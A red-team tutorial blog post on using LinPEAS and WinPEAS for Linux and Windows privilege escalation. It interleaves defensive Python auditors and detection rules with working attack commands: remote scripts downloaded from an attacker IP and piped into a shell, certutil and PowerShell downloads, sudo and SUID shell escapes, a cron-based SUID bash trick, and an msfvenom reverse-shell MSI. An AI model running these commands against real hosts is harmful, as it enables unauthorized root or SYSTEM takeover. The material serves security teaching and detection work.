
LinPEAS / WinPEAS: Let the Automation Find the Mistakes First


Series: The Community's Red Team

Post: 13 of 17

Tags: linpeas, winpeas, privilege escalation, post-exploitation, Linux, Windows, tools

Read time: ~11 min

Prerequisites: Post 12 — Metasploit, Post 11 — Netcat


You've got a shell. You're running as a low-privilege user. The goal is root or SYSTEM. The question is: where's the opening?

Privilege escalation is the art of finding misconfiguration — SUID binaries that shouldn't be SUID, cron jobs running writable scripts, sudo rules that let you run something dangerous, service accounts with excessive permissions. These mistakes are everywhere on real systems because they accumulate over years of configuration changes, developer shortcuts, and IT teams working under deadline pressure.

LinPEAS and WinPEAS (from the PEASS-ng project) are automated enumeration scripts that check for all of them. They run a comprehensive sweep of the machine, color-code the output by risk level, and surface the findings that would take you hours to check manually. They don't exploit anything — they find what to exploit.

This post covers deploying both tools, reading their output, and acting on what they find.


The Color System

Both tools use the same color convention. Learn this — it's how you triage hundreds of lines of output without reading every line:

  • Red/Yellow — Critical: direct path to root/SYSTEM, check immediately

  • Red — High value: probable escalation path

  • Yellow — Interesting: worth investigating

  • Green — Low severity, informational

In practice: scan for red/yellow entries first. Those are your attack surface. Green is background noise.


LinPEAS: Linux Privilege Escalation Awesome Script

Getting it onto the target

The cleanest method is serving it from your attack machine:

# Attack machine — serve linpeas
python3 -m http.server 80
# Target machine — download and execute
curl -L http://<your_ip>/linpeas.sh | sh

# Or download first, then run
wget http://<your_ip>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.txt

tee linpeas.txt saves the output while still printing to the terminal. Always save it — the scan takes a few minutes and you'll want to grep through it later.

If the target has no network access to your machine:

# Base64 encode on attack machine
base64 -w 0 linpeas.sh > linpeas.b64
cat linpeas.b64    # copy the output

# On target — paste and decode
echo "<base64_string>" | base64 -d > linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh

What LinPEAS checks

The script covers over 200 checks across:

  • Current user context, sudo rights, groups

  • SUID/SGID binaries

  • Linux capabilities (cap_setuid, cap_dac_override)

  • Cron jobs and scheduled tasks

  • Writable files and directories owned by root

  • PATH environment abuse

  • Kernel version and CVE suggestions

  • Credential hunting (config files, history files, SSH keys)

  • Network services running internally

  • NFS exports with no_root_squash

  • Docker/LXD group membership

  • Readable /etc/shadow (password hashes)

High-value Linux findings and what to do

Sudo rights with NOPASSWD:

(ALL) NOPASSWD: /usr/bin/vim

Check GTFOBins (gtfobins.github.io) immediately. vim, find, awk, python, perl, less, more — almost every common binary has a shell escape. sudo vim -c ':!/bin/bash' is often all it takes.

SUID binary not in the standard set:

-rwsr-xr-x 1 root root /usr/local/bin/backup

Standard SUID binaries include /bin/su, /usr/bin/passwd, /usr/bin/sudo. Anything custom in /opt/, /home/, or with an unusual name — check GTFOBins, then run strings on it to understand what it does.

Capabilities:

/usr/bin/python3.8 = cap_setuid+ep

cap_setuid lets a binary change its UID. python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' drops you to root.

Writable cron script:

* * * * * root /opt/scripts/backup.sh

If you can write to /opt/scripts/backup.sh, append chmod +s /bin/bash and wait 60 seconds. Then /bin/bash -p gives you a root shell.

Credentials in files:

/var/www/html/config.php: $db_pass = 'Sup3rS3cr3t!'

Spray that password against SSH, sudo, other users, anything.

Docker group membership:

uid=1000(user) gid=1000(user) groups=1000(user),998(docker)

Docker group is effectively root access. docker run -v /:/mnt --rm -it alpine chroot /mnt sh mounts the host filesystem and gives you a root shell.
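For the defender, the same findings are a hardening baseline to audit on every build. The following Python is an added example written for this post, not code from the PEASS-ng project: pure functions that take sudo -l output, a SUID listing compared against a baseline allowlist, getcap output and /etc/crontab together with file ownership and mode data, and flag exactly the conditions described above. All inputs, the allowlist and the file metadata are constructed stand-ins for what you would collect on a real host.

```python
import re
import stat

# Constructed sample inputs standing in for `sudo -l`, a SUID sweep, `getcap -r /`
# and /etc/crontab on a host being audited.
SUDO_L = """\
Matching Defaults entries for user on box:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on box:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
"""

SUID_FOUND = ["/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/usr/local/bin/backup"]
# Assumption: an allowlist captured from a known-good build of the same image.
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/usr/bin/mount"}

GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
"""
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin"}

CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root /opt/scripts/backup.sh
0 3 * * * root /usr/bin/apt-get update
"""
# Constructed stand-in for os.stat(): path -> (mode bits, owner uid)
FILE_INFO = {
    "/opt/scripts/backup.sh": (0o100777, 0),   # world-writable, root-owned
    "/usr/bin/apt-get":       (0o100755, 0),
}

NOPASSWD_RE = re.compile(r"\((?P<runas>[^)]*)\)\s+NOPASSWD:\s*(?P<cmds>.+)")

def nopasswd_rules(sudo_l_text):
    """Return [(runas, command), ...] for every NOPASSWD entry in `sudo -l` output."""
    rules = []
    for line in sudo_l_text.splitlines():
        m = NOPASSWD_RE.search(line)
        if m:
            for cmd in m.group("cmds").split(","):
                rules.append((m.group("runas").strip(), cmd.strip()))
    return rules

def unexpected_suid(found, baseline):
    """SUID binaries present on the host but absent from the baseline allowlist."""
    return sorted(set(found) - set(baseline))

def dangerous_capabilities(getcap_text):
    """Parse getcap output (old 'path = caps+ep' and new 'path caps=ep' forms) and flag risky caps."""
    hits = []
    for line in getcap_text.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, caps = line.partition(" = ") if " = " in line else line.partition(" ")
        names = {c.split("+")[0].split("=")[0] for c in caps.split(",")}
        risky = sorted(names & DANGEROUS_CAPS)
        if risky:
            hits.append((path, risky))
    return hits

def writable_root_cron(crontab_text, file_info):
    """Root cron jobs whose script is writable by group/others, not root-owned, or missing."""
    hits = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or line.startswith("#") or fields[5] != "root":
            continue
        script = fields[6]
        info = file_info.get(script)
        if info is None:
            hits.append((script, "missing (check who can create it)"))
            continue
        mode, uid = info
        if uid != 0:
            hits.append((script, f"owned by uid {uid}, not root"))
        elif mode & (stat.S_IWGRP | stat.S_IWOTH):
            hits.append((script, f"writable by non-root (mode {stat.S_IMODE(mode):o})"))
    return hits

if __name__ == "__main__":
    print("NOPASSWD:", nopasswd_rules(SUDO_L))
    print("unexpected SUID:", unexpected_suid(SUID_FOUND, SUID_BASELINE))
    print("dangerous caps:", dangerous_capabilities(GETCAP))
    print("writable root cron:", writable_root_cron(CRONTAB, FILE_INFO))
```

The cron check only looks at the script's own mode and owner; a writable parent directory lets the file be replaced just as easily, so extend FILE_INFO with directory entries when you wire this to real os.stat() data.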

The order of operations

1. Run linpeas → save output
2. Grep for red/yellow → identify candidates
3. sudo -l → check manually (fastest win)
4. SUID binaries → check each against GTFOBins
5. Capabilities → check cap_setuid, cap_dac_override
6. Cron jobs → check for writable scripts
7. Credential files → test everywhere
8. Kernel CVEs → last resort (noisy, may crash)
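Step 2 is easier with a small triage script than with grep, because LinPEAS marks severity with ANSI colour codes rather than words. The Python below is an added example written for this post, not part of PEASS-ng; it assumes the escape sequences LinPEAS uses for its legend (red-on-yellow 1;31;103, red 1;31, yellow 1;33, green 1;32; check against your copy of the script) and sorts a saved linpeas.txt into severity buckets. The sample text is constructed to look like saved output.

```python
import re
from collections import Counter

# Assumption: LinPEAS colours findings with these SGR parameter strings (the
# script's RED/YELLOW, RED, YELLOW and GREEN). Adjust if your version differs.
SEVERITY_BY_SGR = {
    "1;31;103": "critical",    # red text on yellow background
    "1;31": "high",
    "1;33": "interesting",
    "1;32": "info",
}
SEVERITY_RANK = {"critical": 0, "high": 1, "interesting": 2, "info": 3, "plain": 4}

ANSI_RE = re.compile(r"\x1b\[([0-9;]*)m")

def strip_ansi(line):
    """Remove every SGR escape sequence so the line can be grepped or reported."""
    return ANSI_RE.sub("", line)

def classify(line):
    """Return the most severe colour class used anywhere on the line."""
    best = "plain"
    for params in ANSI_RE.findall(line):
        sev = SEVERITY_BY_SGR.get(params)
        if sev and SEVERITY_RANK[sev] < SEVERITY_RANK[best]:
            best = sev
    return best

def triage(text, minimum="high"):
    """Return (severity, clean_line) tuples at or above `minimum`, most severe first."""
    hits = []
    for raw in text.splitlines():
        sev = classify(raw)
        if SEVERITY_RANK[sev] <= SEVERITY_RANK[minimum]:
            hits.append((sev, strip_ansi(raw).strip()))
    hits.sort(key=lambda h: SEVERITY_RANK[h[0]])   # stable: keeps file order within a bucket
    return hits

def summary(text):
    """How many lines fell into each bucket, for a quick sense of the report."""
    return Counter(classify(line) for line in text.splitlines())

# Constructed sample of what a saved `linpeas.txt` looks like, escape codes included.
SAMPLE = (
    "\x1b[1;33m╔══════════╣ Checking 'sudo -l'\x1b[0m\n"
    "User user may run the following commands on box:\n"
    "    (ALL) \x1b[1;31;103mNOPASSWD\x1b[0m: \x1b[1;31;103m/usr/bin/vim\x1b[0m\n"
    "\x1b[1;33m╔══════════╣ SUID\x1b[0m\n"
    "-rwsr-xr-x 1 root root /usr/bin/passwd\x1b[1;32m (ok)\x1b[0m\n"
    "-rwsr-xr-x 1 root root \x1b[1;31m/usr/local/bin/backup\x1b[0m\n"
)

if __name__ == "__main__":
    for sev, line in triage(SAMPLE):
        print(f"[{sev:>11}] {line}")
    print(dict(summary(SAMPLE)))
```

Feed it the real file with triage(open("linpeas.txt").read()); lower minimum to "interesting" once the red and red/yellow lines are exhausted.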

WinPEAS: Windows Privilege Escalation Awesome Script

The Windows equivalent. Same color system, same philosophy — sweep everything, surface the critical findings first.

Getting it onto the target

From your attack machine (Python HTTP server):

python3 -m http.server 80

On the Windows target:

:: CMD — certutil download
certutil -urlcache -split -f http://<your_ip>/winpeas.exe winpeas.exe

:: PowerShell download
(New-Object System.Net.WebClient).DownloadFile('http://<your_ip>/winpeas.exe','C:\Windows\Temp\winpeas.exe')
iwr http://<your_ip>/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe

Run it:

winpeas.exe > winpeas.txt 2>&1

Or for terminal color output (shows the red/yellow in the shell):

winpeas.exe color
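Every delivery step shown above, for LinPEAS and for WinPEAS, leaves a distinctive process-creation record on the host, which is what an EDR or SIEM rule keys on. The Python below is an added example, not code from the PEASS-ng project: it turns those command patterns into detection rules and runs them over constructed process-creation log lines. The rule identifiers, the hosts and IPs, and the one-line log format are all assumptions made for the example.

```python
import re

# Each rule: (id, description, regex over the command line). Patterns follow the
# delivery commands shown in this post plus the PEAS file names themselves.
RULES = [
    ("LNX-001", "remote script piped straight into a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")),
    ("LNX-002", "base64 decoded into a script file",
     re.compile(r"base64\s+(-d|--decode)\b.*>\s*\S+\.sh")),
    ("LNX-003", "PEAS enumeration script executed",
     re.compile(r"(^|[/\s])linpeas[^\s]*\.sh\b", re.IGNORECASE)),
    ("WIN-001", "certutil used as a downloader",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*-split\b.*-f\b", re.IGNORECASE)),
    ("WIN-002", "PowerShell web download to disk",
     re.compile(r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b).*(-OutFile|http)",
                re.IGNORECASE)),
    ("WIN-003", "PEAS enumeration binary executed",
     re.compile(r"winpeas[^\s\\]*\.(exe|bat)\b", re.IGNORECASE)),
]

def match_rules(cmdline):
    """Rule ids whose pattern appears in one command line, in RULES order."""
    return [rid for rid, _, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Return [(line, [rule ids]), ...] for every event that matches at least one rule."""
    hits = []
    for line in lines:
        ids = match_rules(line)
        if ids:
            hits.append((line, ids))
    return hits

# Constructed process-creation events: "<timestamp> <host> <user> <command line>"
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01Z web01 www-data curl -L http://203.0.113.5/linpeas.sh | sh",
    "2024-05-01T10:00:09Z web01 www-data sh -c \"echo 'IyEvYmluL3NoCg==' | base64 -d > linpeas.sh\"",
    "2024-05-01T10:00:10Z web01 www-data ./linpeas.sh",
    "2024-05-01T10:05:00Z web01 root /usr/bin/apt-get update",
    "2024-05-01T10:07:00Z ws07 svc_iis certutil -urlcache -split -f http://203.0.113.5/winpeas.exe winpeas.exe",
    "2024-05-01T10:07:30Z ws07 svc_iis powershell -c \"iwr http://203.0.113.5/winpeas.exe -OutFile C:\\Windows\\Temp\\winpeas.exe\"",
    "2024-05-01T10:08:00Z ws07 svc_iis C:\\Windows\\Temp\\winpeas.exe",
    "2024-05-01T10:09:00Z ws07 jsmith notepad.exe C:\\Users\\jsmith\\notes.txt",
]

if __name__ == "__main__":
    for line, ids in scan(SAMPLE_EVENTS):
        print(",".join(ids), "|", line)
```

The file-name rules (LNX-003, WIN-003) are the weakest: a renamed copy defeats them, so the behavioural rules (download piped into a shell, certutil with -urlcache, a web-client call writing to disk) are the ones to keep and tune for false positives in your own telemetry.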

What WinPEAS checks

  • Current user privileges (whoami /priv) — token impersonation rights

  • Unquoted service paths

  • Weak service permissions

  • AlwaysInstallElevated registry keys

  • Stored credentials (registry, Windows Credential Manager)

  • Autologon credentials in registry

  • Scheduled tasks running as SYSTEM with writable paths

  • DLL hijacking opportunities

  • SAM/SYSTEM file accessibility

  • Active network connections and internal services

  • Installed software and versions

  • Sensitive files (web.config, connection strings, private keys)

High-value Windows findings and what to do

SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:

SeImpersonatePrivilege    Impersonate a client after authentication    Enabled

These are the token impersonation privileges. If you're running as a service account (IIS, MSSQL, network service), these are likely enabled. Exploit with PrintSpoofer, JuicyPotato, or GodPotato depending on OS version:

.\PrintSpoofer.exe -i -c cmd
.\GodPotato.exe -cmd "cmd /c whoami"

AlwaysInstallElevated:

AlwaysInstallElevated: 1
HKLM AlwaysInstallElevated: 1

Both registry keys set to 1 means any MSI runs as SYSTEM. Generate a malicious MSI with msfvenom and execute it:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Unquoted service path:

C:\Program Files\My Service\bin\service.exe

If the path has spaces and isn't quoted, Windows searches C:\Program.exe, then C:\Program Files\My.exe before the real path. Drop a malicious binary at an earlier position to intercept execution on service restart.
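Working out which intermediate paths matter, which directory ACLs to review, and what the fixed ImagePath looks like is mechanical, so it belongs in an audit script. The Python below is an added example for this post, not code from WinPEAS: it reproduces the prefix-splitting rule described above, returns the parent directories whose write permissions decide whether the finding is real, and produces the quoted remediation. The service names and paths are constructed.

```python
from pathlib import PureWindowsPath

def _split_exe(image_path):
    """Split a service ImagePath into (executable, trailing arguments)."""
    image_path = image_path.strip()
    end = image_path.lower().find(".exe")
    if end == -1:
        return image_path, ""
    return image_path[: end + 4], image_path[end + 4:]

def hijack_candidates(image_path):
    """Paths Windows tries, in order, before the real binary of an unquoted service path.

    CreateProcess splits an unquoted command line at every space and tries
    '<prefix>.exe' for each prefix, so each space in the directory part of the
    path produces one candidate. A quoted path produces none.
    """
    if image_path.strip().startswith('"'):
        return []
    exe, _ = _split_exe(image_path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def directories_to_review(candidates):
    """Parent directories of the candidates; a non-admin write ACL on any of them makes the finding real."""
    return sorted({str(PureWindowsPath(c).parent) for c in candidates})

def quoted(image_path):
    """Remediated ImagePath: the executable wrapped in double quotes, arguments untouched."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return image_path
    exe, args = _split_exe(image_path)
    return f'"{exe}"{args}'

def audit(services):
    """services: {name: ImagePath}. One finding per service whose path is unquoted and contains a space."""
    findings = []
    for name, path in services.items():
        cands = hijack_candidates(path)
        if cands:
            findings.append({
                "service": name,
                "candidates": cands,
                "review_acls": directories_to_review(cands),
                "fix": quoted(path),
            })
    return findings

# Constructed sample: what a dump of service ImagePath values might look like.
SAMPLE_SERVICES = {
    "MyService": r"C:\Program Files\My Service\bin\service.exe",
    "Updater": r"C:\Program Files (x86)\Vendor Tools\updater.exe -silent",
    "Svchost": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "Backup": r'"C:\Program Files\Backup Agent\agent.exe" --daemon',
}

if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f["service"], f["candidates"], "-> review", f["review_acls"], "-> fix", f["fix"])
```

The fix value is what goes into sc config <service> binPath= (escape the inner quotes for cmd); the review_acls list is where to run icacls before deciding whether the finding is exploitable on that host, since C:\ and C:\Program Files are not writable by standard users on a default install.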

Weak service permissions:

[+] Service: WeakSvc -> Modify permissions

If you can modify the service binary path, replace it with a payload and restart the service.

Autologon credentials:

DefaultUsername: Administrator
DefaultPassword: Password123!

Autologon stores credentials in plaintext registry entries. Test them against everything.

Stored credentials:

Currently stored credentials:
    Target: Domain:interactive=INLANEFREIGHT\administrator
    Type: Domain Password
    User: INLANEFREIGHT\administrator

Use runas /savecred to execute as that user, or list what's stored with cmdkey /list.


Manual Checks to Always Run Alongside PEAS

PEAS finds most things but not everything. These manual checks take seconds and catch things the scripts miss:

Linux

sudo -l                              # sudo rights
id                                   # groups (docker, lxd, adm, disk)
cat /etc/crontab                     # cron jobs
find / -user root -perm -4000 2>/dev/null   # SUID
getcap -r / 2>/dev/null              # capabilities
cat ~/.bash_history                  # credential leaks
netstat -tulpn | grep LISTEN         # internal services

Windows

whoami /all                          & rem privileges and group memberships
whoami /priv                         & rem token privileges
net localgroup administrators        & rem local admin members
systeminfo                           & rem OS version, patches
wmic qfe                             & rem installed patches (patch gaps = CVE opportunities)
netstat -ano                         & rem active connections and listening ports

Quick Reference

# Serve LinPEAS from attack machine
python3 -m http.server 80

# Download and run on Linux target
curl -L http://<your_ip>/linpeas.sh | sh
wget http://<your_ip>/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh | tee linpeas.txt

# Base64 transfer (no network)
base64 -w 0 linpeas.sh > linpeas.b64    # encode
echo "<b64>" | base64 -d > linpeas.sh  # decode on target

# Download WinPEAS on Windows target
certutil -urlcache -split -f http://<your_ip>/winpeas.exe winpeas.exe
iwr http://<your_ip>/winpeas.exe -OutFile winpeas.exe

# Run WinPEAS
winpeas.exe > winpeas.txt 2>&1
winpeas.exe color    # terminal color output

# Key manual checks — Linux
sudo -l
find / -user root -perm -4000 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab

# Key manual checks — Windows
whoami /priv
wmic qfe

What's Next

With PEAS identifying the attack surface, Post 14 (Impacket) covers the Windows protocol toolkit — the Python suite that handles everything from remote code execution and hash dumping to Kerberoasting and DCSync from your Linux attack machine. It's the bridge between having credentials and owning the Windows environment.

MeshForge — Training the Community's Red Team

They count on your ignorance. The exploit only works on the uninformed.
